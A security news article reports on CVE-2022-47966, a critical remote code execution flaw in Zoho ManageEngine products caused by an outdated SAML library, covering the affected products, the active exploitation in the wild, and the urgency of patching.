The ManageEngine vulnerability is easy to exploit and enables remote code execution. Patches are available. Credit: Suebsiri / Getty Images Users of on-premises deployments of Zoho ManageEngine products should make sure they have patches applied for a critical remote code execution vulnerability that attackers have now started exploiting in the wild. Technical details about the flaw along with a proof-of-concept exploit was released late last week, which will allow more attackers to add this exploit to their arsenal.“The vulnerability is easy to exploit and a good candidate for attackers to ‘spray and pray’ across the Internet,” researchers with penetration testing firm Horizon3.ai said in a blog post. “This vulnerability allows for remote code execution as NT AUTHORITYSYSTEM, essentially giving an attacker complete control over the system. If a user determines they have been compromised, additional investigation is required to determine any damage an attacker has done.”Zoho released security updates during October and November for multiple products to address the flaw, which is now tracked as CVE-2022-47966. However, the security advisory was only published this month and as of last week there were over 1,000 vulnerable instances of ManageEngine products directly exposed to the internet and probably many more inside large corporate networks. SAML ShowStopper vulnerabilityThe vulnerability was found by a researcher named Khoadha, a.k.a. @_l0gg, from Vietnamese firm Viettel Cyber Security and was reported privately to Zoho through its bug bounty program in late October. When ManageEngine issued its advisory on January 10, researchers from Horizon3.ai investigated it and reverse-engineered the patch to create a working proof-of-concept exploit. After giving the community a heads-up that the flaw is very serious and easy to exploit and sharing some IOCs that could enable exploit detection, they waited several days before publishing their findings. Khoadha came out with a detailed write-up at the same time. The issue is located in old versions of a library called libxmlsec from the Apache Santuario open-source project. The version of the library used in ManageEngine products was over a decade old. Newer versions are not affected because of security enhancements added over time, though Khoadha’s findings are new.Apache Santuario implements security standards for XML, primarily XML-Signature Syntax and Processing and XML Encryption Syntax and Processing. These are commonly used in Security Assertion Markup Language (SAML), a protocol that’s popular in single sign-on (SSO) implementations to communicate between identity providers and service providers. Enterprises use SAML to enable employees to use the same identity across different applications and services. Zoho ManageEngine provides a suite of products for enterprises, many of which support SAML-based SSO. Some of the products are affected if they currently have SAML SSO enabled, while some are affected if they ever had it enabled in the past, even if they don’t anymore. The affected products are:Access Manager PlusActive Directory 360ADAudit PlusADManager PlusADSelfService PlusAnalytics PlusApplication Control PlusAsset ExplorerBrowser Security PlusDevice Control PlusEndpoint CentralEndpoint Central MSPEndpoint DLPKey Manager PlusOS DeployerPAM 360Password Manager ProPatch Manager PlusRemote Access PlusRemote Monitoring and Management (RMM)ServiceDesk PlusServiceDesk Plus MSPSupportCenter PlusVulnerability Manager Plus“In summary, when Apache Santuario is Even though the research was done on ManageEngine products, Khoadha warns in his own write-up that the flaw is not limited to them and products from other companies that use any of the impacted versions of libxmlsec for SAML could be similarly impacted. That’s why he has dubbed the flaw as SAML ShowStopper. Attackers are already exploiting the ManageEngine flawResearchers from security firm Rapid7 reported on January 19 that they already responded to compromises that resulted from exploitation of CVE-2022-47966. The company later updated their advisory with indicators of compromise that they were seeing in the wild as well as MITRE ATT&CK techniques the attackers were using post exploitation. This includes using PowerShell to disable Windows Defender and deploying a tunneling tool writer in Golang and called Chisel.“Our vulnerability research team found during testing that some products may be more exploitable than others: ServiceDesk Plus, for instance, is easily exploitable with public proof-of-concept code, but ADSelfService Plus requires an attacker to obtain two additional pieces of information and modify the PoC for successful exploitation,” the Rapid7 researchers said.Security firm GreyNoise is also detecting exploitation attempts on its honeypots. Vulnerabilities that can be exploited for remote code execution without authentication and have a public proof-of-concept are usually quickly adopted by attackers so it is likely the number of attacks will only increase. Organizations that don’t directly expose any of these ManageEngine products to the internet should still apply the patches as soon as possible, because attackers can obtain network access in a variety of ways and this flaw can then be exploited for lateral movement. Many ManageEngine products are used for security, identity management and authentication so they contain sensitive information. Related content news CISA, FBI urge developers to patch path traversal bugs before shipping The advisory highlights how developers can follow best practices to fix these vulnerabilities during production. By Shweta Sharma May 03, 2024 3 mins Vulnerabilities news Microsoft continues to add, shuffle security execs in the wake of security incidents The company has appointed new product security chiefs as well as a customer-facing CISO as it continues to respond to high-profile attacks on its products and own network. By Elizabeth Montalbano May 03, 2024 4 mins CSO and CISO feature Malware explained: How to prevent, detect and recover from it What are the types of malware? How does malware spread? How do you know if you’re infected? We've got answers. By Josh Fruhlinger May 03, 2024 18 mins Ransomware Phishing Malware brandpost Sponsored by Cyber NewsWire LayerX Security Raises $26M for its Browser Security Platform, Enabling Employees to Work Securely from Any Browser, Anywhere Early adoption by Fortune 100 companies worldwide, LayerX already secures more users than any other browser security solution and enables unmatched security, performance and experience By Cyber NewsWire May 02, 2024 4 mins Cyberattacks Security PODCASTS VIDEOS RESOURCES EVENTS SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe